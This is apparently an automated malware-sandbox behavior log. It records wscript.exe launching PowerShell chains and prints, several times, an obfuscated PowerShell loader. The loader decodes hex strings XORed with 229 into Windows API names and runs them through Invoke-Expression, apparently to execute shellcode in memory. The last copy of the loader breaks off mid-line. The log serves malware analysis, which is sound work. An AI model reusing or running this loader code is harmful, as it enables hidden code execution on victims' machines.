Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3666Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$badeanstalt = """refliuefnbrcextapihjostnbu hyhfltdubsp su{hi cl an pa bapinacarziasomvo(cz[pasdetalrcaiennougde]ca`$udhbasud)fr;ag at ud ho af`$usbeuyaktnoepasbo sa=sn thnanenowbo-muogrbepjloeddcbethu tobpayvrtseela[al]po bd(me`$vahtnsde.relpeenonvegmatunhsl re/sk di2gi)ko;un ge ma is gefflolerwi(fe`$haiop=om0pe;fu ma`$phido ge-maltitse fa`$syhbesba.dolunedenscgdotunhca;do un`$reiom+re=be2du)va{fl pl re ad ot ta sp sk ho`$dobfeydetleegassm[fi`$geiaf/na2de]od ge=sa tr[recskounnlivkresirortbr]il:me:datdiodibboypatglesu(po`$ushhesph.bosfruafbnesmatunrpriponungla(il`$stipa,su jo2po)ca,bl af1sn6du)no;ma te un`$mibkryprtchegtspa[du`$syiun/tr2fi]mi ta=ha ah(fo`$sibbiyintopeovsol[kb`$spihe/ar2fr]fe ci-frbrexenophrti hy2st2re9la)lo;so le de ca vr}re un[muskutsqrlaiapnnogbl]pe[maschyinsdetpaenemst.vatbaekaxibtbi.reemanplcgeourdprimonprgsy]si:ko:raaudsakcwaifoisa.mogbaebuttasgutunrfriulningba(ba`$fobseypittheansid)li;bl}ga`$dehbrdsaluncir0sk=krhoutbebaf ry'bebre6te9spcbe9be6pr9gr1js8et0am8in8secenbca8co1in8ta9pr8cr9de'sy;lu`$plhrvdaflfocin1de=trhditzibve un'feakr8re8tacde8sl6gr9ag7is8xyasv9sp6sh8caahe8de3bl9an1unctibtebab2ha8smcur8subcudbu6lkdti7macmebsebde0as8trbch9ah6me8to4pr8ne3fr8in0boarebra8st4ti9ve1un8apcop9dk3bi8co0suacl8an8en0un9in1mo8dedan8peaud8wu1ra9ca6ba'fo;el`$lohbldnolsucbo2ne=tnhbltunbsp ne'siafi2sk8ti0di9ul1tyblo5ob9fi7no8byace8an6poala4da8bi1ka8im1wh9gt7lo8ge0rr9br6br9di6ar'fl;gr`$cyheidarlblcpr3pr=ovhentnobco ta'lebun6re9upcgu9sn6gn9fa1br8mo0da8pr8lycovbbebwa7sk9fo0sa8mabde9ev1af8kacba8oc8sc8he0nocobbfoatocde8sibsi9se1be8or0se9no7fl8huaou9ty5rabco6kr8sk0dd9se7as9ri3le8lacbr8we6ou8di0oc9be6dackabteaundpu8se4st8isber8si1ja8ng9li8sp0fobdi7ci8ex0vi8st3sl'sk;de`$flhpedjaljdcti4ki=klhsttprbfo ge'th9fi6af9sy1af9re7he8crcwi8fobst8ov2be'bl;al`$anhindaclfocbu5ta=ovhdetwhbun ca'udade2sy8pi0in9af1caari8ha8prano8sl1py9du0gn8ki9ud8po0muaundne8no4ud8epbac8vi1bj8sp9st8op0an'af;se`$orhbydgrlcicfo6hm=cehsktinbha di'fabin7apbin1wabbe6em9re5sa8no0wo8ai6mi8micba8pa4sh8el9noastbfo8un4ko8om8lo8ro0stcfo9chcco5syajudag8afcco8in1ps8in0frami7se9lactabbr6er8ticap8hu2pocep9suclo5mibre5ps9no0wa8ko7st8sa9po8fuccr8eg6no'in;hu`$inhcadudlrocst7mi=rehprtrobze da'nebpa7ri9di0un8chbgn9ea1ku8skcme8pr8su8di0ovcka9mocsa5swaud8un8bl4si8dibly8un4ur8gl2fa8fi0wh8ne1sc'wa;dd`$dehopdselnocaz8tr=byhditsibpy ev'avbun7di8tr0om8in3ma8fr9pr8ud0pr8fe6tr9br1sl8mi0gr8in1biave1hy8sv0ur8hv9pl8bl0kl8ph2ni8se4fa9fy1xy8ch0na'sa;dr`$cohafddolvocen9nd=pihkotasbef in'psaprcgl8mubfeata8fo8kp0un8re8co8uname9bl7at9glcfoafr8ny8elami8ek1fy9st0ek8mi9he8vr0me're;sv`$resactinykarrekgoeartunrhynwaemu0ov=inhaltetbbo sk'skade8sh9decprash1ri8sc0va8re9ko8co0sc8da2st8af4by9sy1mi8af0subho1st9fecfl9an5ma8ob0cl'tr;fo`$besbatdiyanrsukreewatoprsunthest1ch=ashbetlibsk le'spama6hs8mo9no8da4ha9sa6ve9po6stcun9kocne5enbsq5pi9st0lo8rn7ch8tw9ud8brchy8fo6uncfu9rocph5prbpa6tm8fe0mi8or4bl8pr9ra8fa0pr8us1glcly9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function htb { param([string]$hs); $bytes = new-object byte[] ($hs.length / 2); for($i=0; $i -lt $hs.length; $i+=2){ $bytes[$i/2] = [convert]::tobyte($hs.substring($i, 2), 16); $bytes[$i/2] = ($bytes[$i/2] -bxor 229); } [string][system.text.encoding]::ascii.getstring($bytes);}$hdlc0=htb 'b69c96918088cb818989';$hdlc1=htb 'a88c86978a968a8391cbb28c8bd6d7cbb08b96848380ab84918c9380a880918d8a8196';$hdlc2=htb 'a28091b5978a86a4818197809696';$hdlc3=htb 'b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083';$hdlc4=htb '9691978c8b82';$hdlc5=htb 'a28091a88a81908980ad848b818980';$hdlc6=htb 'b7b1b69580868c8489ab848880c9c5ad8c8180a79cb68c82c9c5b59087898c86';$hdlc7=htb 'b7908b918c8880c9c5a8848b84828081';$hdlc8=htb 'b78083898086918081a180898082849180';$hdlc9=htb 'ac8ba880888a979ca88a81908980';$styrketrne0=htb 'a89ca180898082849180b19c9580';$styrketrne1=htb 'a689849696c9c5b59087898c86c9c5b68084898081c9c5a48b968ca689849696c9c5a490918aa689849696';$styrketrne2=htb 'ac8b938a8e80';$styrketrne3=htb 'b59087898c86c9c5ad8c8180a79cb68c82c9c5ab8092b6898a91c9c5b38c9791908489';$styrketrne4=htb 'b38c9791908489a489898a86';$styrketrne5=htb '8b91818989';$styrketrne6=htb 'ab91b5978a91808691b38c9791908489a880888a979c';$styrketrne7=htb 'aca0bd';$styrketrne8=htb 'b9';function fkp {param ($v_m, $v_p) ;$leucifer0 =htb 'c193908b88c5d8c5cdbea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba28091a49696808887898c8096cdccc599c5b28d809780c8aa878f808691c59ec5c1bacba2898a878489a49696808887899ca684868d80c5c8a48b81c5c1bacba98a8684918c8a8bcbb695898c91cdc1b6919c978e8091978b80ddccbec8d4b8cba09490848996cdc1ad818986d5ccc598cccba28091b19c9580cdc1ad818986d4cc';&($styrketrne7) $leucifer0;$leucifer5 = htb 'c1938497ba829584c5d8c5c193908b88cba28091a880918d8a81cdc1ad818986d7c9c5beb19c9580beb8b8c5a5cdc1ad818986d6c9c5c1ad818986d1cccc';&($styrketrne7) $leucifer5;$leucifer1 = htb '97809190978bc5c1938497ba829584cbac8b938a8e80cdc18b908989c9c5a5cdbeb69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083b8cdab8092c8aa878f808691c5b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083cdcdab8092c8aa878f808691c5ac8b91b59197ccc9c5cdc193908b88cba28091a880918d8a81cdc1ad818986d0cccccbac8b938a8e80cdc18b908989c9c5a5cdc193ba88ccccccccc9c5c193ba95cccc';&($styrketrne7) $leucifer1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $var_parameters,[parameter(position = 1)] [type] $vrt = [void]);$leucifer2 = htb 'c1b3b1a7c5d8c5bea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba180838c8b80a19c8b84888c86a49696808887899ccdcdab8092c8aa878f808691c5b69c96918088cbb78083898086918c8a8bcba49696808887899cab848880cdc1ad818986ddccccc9c5beb69c96918088cbb78083898086918c8a8bcba0888c91cba49696808887899ca7908c89818097a48686809696b8dfdfb7908bcccba180838c8b80a19c8b84888c86a88a81908980cdc1ad818986dcc9c5c
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$badeanstalt = """refliuefnbrcextapihjostnbu hyhfltdubsp su{hi cl an pa bapinacarziasomvo(cz[pasdetalrcaiennougde]ca`$udhbasud)fr;ag at ud ho af`$usbeuyaktnoepasbo sa=sn thnanenowbo-muogrbepjloeddcbethu tobpayvrtseela[al]po bd(me`$vahtnsde.relpeenonvegmatunhsl re/sk di2gi)ko;un ge ma is gefflolerwi(fe`$haiop=om0pe;fu ma`$phido ge-maltitse fa`$syhbesba.dolunedenscgdotunhca;do un`$reiom+re=be2du)va{fl pl re ad ot ta sp sk ho`$dobfeydetleegassm[fi`$geiaf/na2de]od ge=sa tr[recskounnlivkresirortbr]il:me:datdiodibboypatglesu(po`$ushhesph.bosfruafbnesmatunrpriponungla(il`$stipa,su jo2po)ca,bl af1sn6du)no;ma te un`$mibkryprtchegtspa[du`$syiun/tr2fi]mi ta=ha ah(fo`$sibbiyintopeovsol[kb`$spihe/ar2fr]fe ci-frbrexenophrti hy2st2re9la)lo;so le de ca vr}re un[muskutsqrlaiapnnogbl]pe[maschyinsdetpaenemst.vatbaekaxibtbi.reemanplcgeourdprimonprgsy]si:ko:raaudsakcwaifoisa.mogbaebuttasgutunrfriulningba(ba`$fobseypittheansid)li;bl}ga`$dehbrdsaluncir0sk=krhoutbebaf ry'bebre6te9spcbe9be6pr9gr1js8et0am8in8secenbca8co1in8ta9pr8cr9de'sy;lu`$plhrvdaflfocin1de=trhditzibve un'feakr8re8tacde8sl6gr9ag7is8xyasv9sp6sh8caahe8de3bl9an1unctibtebab2ha8smcur8subcudbu6lkdti7macmebsebde0as8trbch9ah6me8to4pr8ne3fr8in0boarebra8st4ti9ve1un8apcop9dk3bi8co0suacl8an8en0un9in1mo8dedan8peaud8wu1ra9ca6ba'fo;el`$lohbldnolsucbo2ne=tnhbltunbsp ne'siafi2sk8ti0di9ul1tyblo5ob9fi7no8byace8an6poala4da8bi1ka8im1wh9gt7lo8ge0rr9br6br9di6ar'fl;gr`$cyheidarlblcpr3pr=ovhentnobco ta'lebun6re9upcgu9sn6gn9fa1br8mo0da8pr8lycovbbebwa7sk9fo0sa8mabde9ev1af8kacba8oc8sc8he0nocobbfoatocde8sibsi9se1be8or0se9no7fl8huaou9ty5rabco6kr8sk0dd9se7as9ri3le8lacbr8we6ou8di0oc9be6dackabteaundpu8se4st8isber8si1ja8ng9li8sp0fobdi7ci8ex0vi8st3sl'sk;de`$flhpedjaljdcti4ki=klhsttprbfo ge'th9fi6af9sy1af9re7he8crcwi8fobst8ov2be'bl;al`$anhindaclfocbu5ta=ovhdetwhbun ca'udade2sy8pi0in9af1caari8ha8prano8sl1py9du0gn8ki9ud8po0muaundne8no4ud8epbac8vi1bj8sp9st8op0an'af;se`$orhbydgrlcicfo6hm=cehsktinbha di'fabin7apbin1wabbe6em9re5sa8no0wo8ai6mi8micba8pa4sh8el9noastbfo8un4ko8om8lo8ro0stcfo9chcco5syajudag8afcco8in1ps8in0frami7se9lactabbr6er8ticap8hu2pocep9suclo5mibre5ps9no0wa8ko7st8sa9po8fuccr8eg6no'in;hu`$inhcadudlrocst7mi=rehprtrobze da'nebpa7ri9di0un8chbgn9ea1ku8skcme8pr8su8di0ovcka9mocsa5swaud8un8bl4si8dibly8un4ur8gl2fa8fi0wh8ne1sc'wa;dd`$dehopdselnocaz8tr=byhditsibpy ev'avbun7di8tr0om8in3ma8fr9pr8ud0pr8fe6tr9br1sl8mi0gr8in1biave1hy8sv0ur8hv9pl8bl0kl8ph2ni8se4fa9fy1xy8ch0na'sa;dr`$cohafddolvocen9nd=pihkotasbef in'psaprcgl8mubfeata8fo8kp0un8re8co8uname9bl7at9glcfoafr8ny8elami8ek1fy9st0ek8mi9he8vr0me're;sv`$resactinykarrekgoeartunrhynwaemu0ov=inhaltetbbo sk'skade8sh9decprash1ri8sc0va8re9ko8co0sc8da2st8af4by9sy1mi8af0subho1st9fecfl9an5ma8ob0cl'tr;fo`$besbatdiyanrsukreewatoprsunthest1ch=ashbetlibsk le'spama6hs8mo9no8da4ha9sa6ve9po6stcun9kocne5enbsq5pi9st0lo8rn7ch8tw9ud8brchy8fo6uncfu9rocph5prbpa6tm8fe0mi8or4bl8pr9ra8fa0pr8us1glcly9Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function htb { param([string]$hs); $bytes = new-object byte[] ($hs.length / 2); for($i=0; $i -lt $hs.length; $i+=2){ $bytes[$i/2] = [convert]::tobyte($hs.substring($i, 2), 16); $bytes[$i/2] = ($bytes[$i/2] -bxor 229); } [string][system.text.encoding]::ascii.getstring($bytes);}$hdlc0=htb 'b69c96918088cb818989';$hdlc1=htb 'a88c86978a968a8391cbb28c8bd6d7cbb08b96848380ab84918c9380a880918d8a8196';$hdlc2=htb 'a28091b5978a86a4818197809696';$hdlc3=htb 'b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083';$hdlc4=htb '9691978c8b82';$hdlc5=htb 'a28091a88a81908980ad848b818980';$hdlc6=htb 'b7b1b69580868c8489ab848880c9c5ad8c8180a79cb68c82c9c5b59087898c86';$hdlc7=htb 'b7908b918c8880c9c5a8848b84828081';$hdlc8=htb 'b78083898086918081a180898082849180';$hdlc9=htb 'ac8ba880888a979ca88a81908980';$styrketrne0=htb 'a89ca180898082849180b19c9580';$styrketrne1=htb 'a689849696c9c5b59087898c86c9c5b68084898081c9c5a48b968ca689849696c9c5a490918aa689849696';$styrketrne2=htb 'ac8b938a8e80';$styrketrne3=htb 'b59087898c86c9c5ad8c8180a79cb68c82c9c5ab8092b6898a91c9c5b38c9791908489';$styrketrne4=htb 'b38c9791908489a489898a86';$styrketrne5=htb '8b91818989';$styrketrne6=htb 'ab91b5978a91808691b38c9791908489a880888a979c';$styrketrne7=htb 'aca0bd';$styrketrne8=htb 'b9';function fkp {param ($v_m, $v_p) ;$leucifer0 =htb 'c193908b88c5d8c5cdbea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba28091a49696808887898c8096cdccc599c5b28d809780c8aa878f808691c59ec5c1bacba2898a878489a49696808887899ca684868d80c5c8a48b81c5c1bacba98a8684918c8a8bcbb695898c91cdc1b6919c978e8091978b80ddccbec8d4b8cba09490848996cdc1ad818986d5ccc598cccba28091b19c9580cdc1ad818986d4cc';&($styrketrne7) $leucifer0;$leucifer5 = htb 'c1938497ba829584c5d8c5c193908b88cba28091a880918d8a81cdc1ad818986d7c9c5beb19c9580beb8b8c5a5cdc1ad818986d6c9c5c1ad818986d1cccc';&($styrketrne7) $leucifer5;$leucifer1 = htb '97809190978bc5c1938497ba829584cbac8b938a8e80cdc18b908989c9c5a5cdbeb69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083b8cdab8092c8aa878f808691c5b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083cdcdab8092c8aa878f808691c5ac8b91b59197ccc9c5cdc193908b88cba28091a880918d8a81cdc1ad818986d0cccccbac8b938a8e80cdc18b908989c9c5a5cdc193ba88ccccccccc9c5c193ba95cccc';&($styrketrne7) $leucifer1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $var_parameters,[parameter(position = 1)] [type] $vrt = [void]);$leucifer2 = htb 'c1b3b1a7c5d8c5bea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba180838c8b80a19c8b84888c86a49696808887899ccdcdab8092c8aa878f808691c5b69c96918088cbb78083898086918c8a8bcba49696808887899cab848880cdc1ad818986ddccccc9c5beb69c96918088cbb78083898086918c8a8bcba0888c91cba49696808887899ca7908c89818097a48686809696b8dfdfb7908bcccba180838c8b80a19c8b84888c86a88a81908980cdc1ad818986dcc9c5cJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 